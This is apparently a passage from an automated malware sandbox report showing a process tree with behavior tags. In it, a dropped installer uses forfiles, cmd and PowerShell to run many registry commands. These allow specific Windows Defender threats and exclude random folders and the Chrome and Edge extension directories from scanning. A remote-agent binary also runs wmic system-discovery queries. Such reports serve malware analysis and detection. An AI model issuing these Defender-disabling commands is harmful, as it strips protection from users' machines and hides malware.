                                                • C:\Windows\SysWOW64\WerFault.exe
                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 5564 -ip 5564
                                                  1⤵
                                                    PID:5948
                                                  • C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
                                                    C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
                                                    1⤵
                                                    • Executes dropped EXE
                                                    PID:5420
                                                  • C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
                                                    C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
                                                    1⤵
                                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                    • Checks BIOS information in registry
                                                    • Executes dropped EXE
                                                    • Identifies Wine through registry keys
                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                    PID:5968
                                                  • C:\Windows\System32\rundll32.exe
                                                    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                    1⤵
                                                      PID:212
                                                    • C:\Program Files (x86)\Mesh Agent\MeshAgent.exe
                                                      "C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"
                                                      1⤵
                                                      • Executes dropped EXE
                                                      • Drops file in System32 directory
                                                      • Drops file in Program Files directory
                                                      PID:5592
                                                      • C:\Windows\SysWOW64\wbem\wmic.exe
                                                        wmic SystemEnclosure get ChassisTypes
                                                        2⤵
                                                          PID:2980
                                                        • C:\Windows\SysWOW64\wbem\wmic.exe
                                                          wmic os get oslanguage /FORMAT:LIST
                                                          2⤵
                                                          • System Location Discovery: System Language Discovery
                                                          PID:1052
                                                        • C:\Windows\SysWOW64\wbem\wmic.exe
                                                          wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
                                                          2⤵
                                                            PID:6004
                                                          • C:\Windows\SysWOW64\wbem\wmic.exe
                                                            wmic os get oslanguage /FORMAT:LIST
                                                            2⤵
                                                              PID:6092
                                                            • C:\Windows\SysWOW64\wbem\wmic.exe
                                                              wmic SystemEnclosure get ChassisTypes
                                                              2⤵
                                                              • System Location Discovery: System Language Discovery
                                                              PID:5252
                                                            • C:\Windows\SysWOW64\wbem\wmic.exe
                                                              wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
                                                              2⤵
                                                              • System Location Discovery: System Language Discovery
                                                              PID:208
                                                          • C:\Program Files (x86)\Mesh Agent\MeshAgent.exe
                                                            "C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"
                                                            1⤵
                                                            • Executes dropped EXE
                                                            • Drops file in System32 directory
                                                            • Drops file in Program Files directory
                                                            • System Location Discovery: System Language Discovery
                                                            PID:180
                                                            • C:\Windows\SysWOW64\wbem\wmic.exe
                                                              wmic SystemEnclosure get ChassisTypes
                                                              2⤵
                                                              • System Location Discovery: System Language Discovery
                                                              PID:5420
                                                            • C:\Windows\SysWOW64\wbem\wmic.exe
                                                              wmic os get oslanguage /FORMAT:LIST
                                                              2⤵
                                                              • System Location Discovery: System Language Discovery
                                                              PID:5656
                                                            • C:\Windows\SysWOW64\wbem\wmic.exe
                                                              wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
                                                              2⤵
                                                              • System Location Discovery: System Language Discovery
                                                              PID:1280
                                                            • C:\Windows\SysWOW64\wbem\wmic.exe
                                                              wmic SystemEnclosure get ChassisTypes
                                                              2⤵
                                                              • System Location Discovery: System Language Discovery
                                                              PID:5296
                                                            • C:\Windows\SysWOW64\wbem\wmic.exe
                                                              wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
                                                              2⤵
                                                                PID:5516
                                                            • C:\Users\Admin\AppData\Local\Temp\7zSAD81.tmp\Install.exe
                                                              C:\Users\Admin\AppData\Local\Temp\7zSAD81.tmp\Install.exe od /fxNCdidG 385121 /S
                                                              1⤵
                                                              • Executes dropped EXE
                                                              • Modifies data under HKEY_USERS
                                                              PID:4388
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                2⤵
                                                                  PID:4520
                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                    3⤵
                                                                    • Indirect Command Execution
                                                                    PID:2684
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                      4⤵
                                                                        PID:5732
                                                                        • \??\c:\windows\SysWOW64\reg.exe
                                                                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                          5⤵
                                                                            PID:396
                                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                                        forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                        3⤵
                                                                        • Indirect Command Execution
                                                                        • System Location Discovery: System Language Discovery
                                                                        PID:2292
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                          4⤵
                                                                            PID:1324
                                                                            • \??\c:\windows\SysWOW64\reg.exe
                                                                              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                              5⤵
                                                                              • System Location Discovery: System Language Discovery
                                                                              PID:2720
                                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                                          forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                          3⤵
                                                                          • Indirect Command Execution
                                                                          PID:5112
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                            4⤵
                                                                              PID:1008
                                                                              • \??\c:\windows\SysWOW64\reg.exe
                                                                                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                5⤵
                                                                                  PID:1844
                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                              forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                              3⤵
                                                                              • Indirect Command Execution
                                                                              PID:2128
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                4⤵
                                                                                • System Location Discovery: System Language Discovery
                                                                                PID:3100
                                                                                • \??\c:\windows\SysWOW64\reg.exe
                                                                                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                  5⤵
                                                                                    PID:6132
                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                3⤵
                                                                                • Indirect Command Execution
                                                                                PID:2712
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                  4⤵
                                                                                    PID:5100
                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                      5⤵
                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                      • Drops file in System32 directory
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      • Modifies data under HKEY_USERS
                                                                                      PID:4920
                                                                                      • C:\Windows\SysWOW64\gpupdate.exe
                                                                                        "C:\Windows\system32\gpupdate.exe" /force
                                                                                        6⤵
                                                                                          PID:1460
                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
                                                                                  2⤵
                                                                                  • Modifies data under HKEY_USERS
                                                                                  PID:5628
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                    3⤵
                                                                                      PID:2860
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                        4⤵
                                                                                          PID:2524
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
                                                                                        3⤵
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        PID:5108
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
                                                                                        3⤵
                                                                                          PID:5812
                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
                                                                                          3⤵
                                                                                            PID:5244
                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
                                                                                            3⤵
                                                                                              PID:6120
                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
                                                                                              3⤵
                                                                                                PID:2316
                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
                                                                                                3⤵
                                                                                                • System Location Discovery: System Language Discovery
                                                                                                PID:3728
                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
                                                                                                3⤵
                                                                                                  PID:5364
                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
                                                                                                  3⤵
                                                                                                    PID:5156
                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
                                                                                                    3⤵
                                                                                                      PID:4128
                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
                                                                                                      3⤵
                                                                                                        PID:1888
                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
                                                                                                        3⤵
                                                                                                          PID:6024
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
                                                                                                          3⤵
                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                          PID:2516
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
                                                                                                          3⤵
                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                          PID:2188
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
                                                                                                          3⤵
                                                                                                            PID:2328
                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
                                                                                                            3⤵
                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                            PID:6012
                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
                                                                                                            3⤵
                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                            PID:6056
                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
                                                                                                            3⤵
                                                                                                              PID:5544
                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
                                                                                                              3⤵
                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                              PID:4572
                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
                                                                                                              3⤵
                                                                                                                PID:4116
                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
                                                                                                                3⤵
                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                PID:3596
                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
                                                                                                                3⤵
                                                                                                                  PID:2292
                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
                                                                                                                  3⤵
                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                  PID:2952
                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
                                                                                                                  3⤵
                                                                                                                    PID:4836
                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
                                                                                                                    3⤵
                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                    PID:1000
                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
                                                                                                                    3⤵
                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                    PID:5456
                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
                                                                                                                    3⤵
                                                                                                                      PID:5596
                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
                                                                                                                      3⤵
                                                                                                                        PID:4268
                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\HGkiLKyuzZxFeyplLWR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\HGkiLKyuzZxFeyplLWR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\IzHIiCzEU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\IzHIiCzEU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\JMqUiwfxGTAnC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\JMqUiwfxGTAnC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PZogILZPltnU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PZogILZPltnU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\VcmwxBYZVXUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\VcmwxBYZVXUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\wVyQrcfqlRUHlPVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\wVyQrcfqlRUHlPVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\vJPXtkvkgIniScojh\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\vJPXtkvkgIniScojh\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\JXQwtsvqcJittKph\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\JXQwtsvqcJittKph\" /t REG_DWORD /d 0 /reg:64;"
                                                                                                                      2⤵
                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                      PID:5524
                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                        "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HGkiLKyuzZxFeyplLWR" /t REG_DWORD /d 0 /reg:32
                                                                                                                        3⤵
                                                                                                                          PID:2388
                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                            REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HGkiLKyuzZxFeyplLWR" /t REG_DWORD /d 0 /reg:32
                                                                                                                            4⤵
                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                            PID:3448
                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HGkiLKyuzZxFeyplLWR" /t REG_DWORD /d 0 /reg:64
                                                                                                                          3⤵
                                                                                                                            PID:872
                                                                                                                          • C:\Windows\SysWOW64\reg.exe
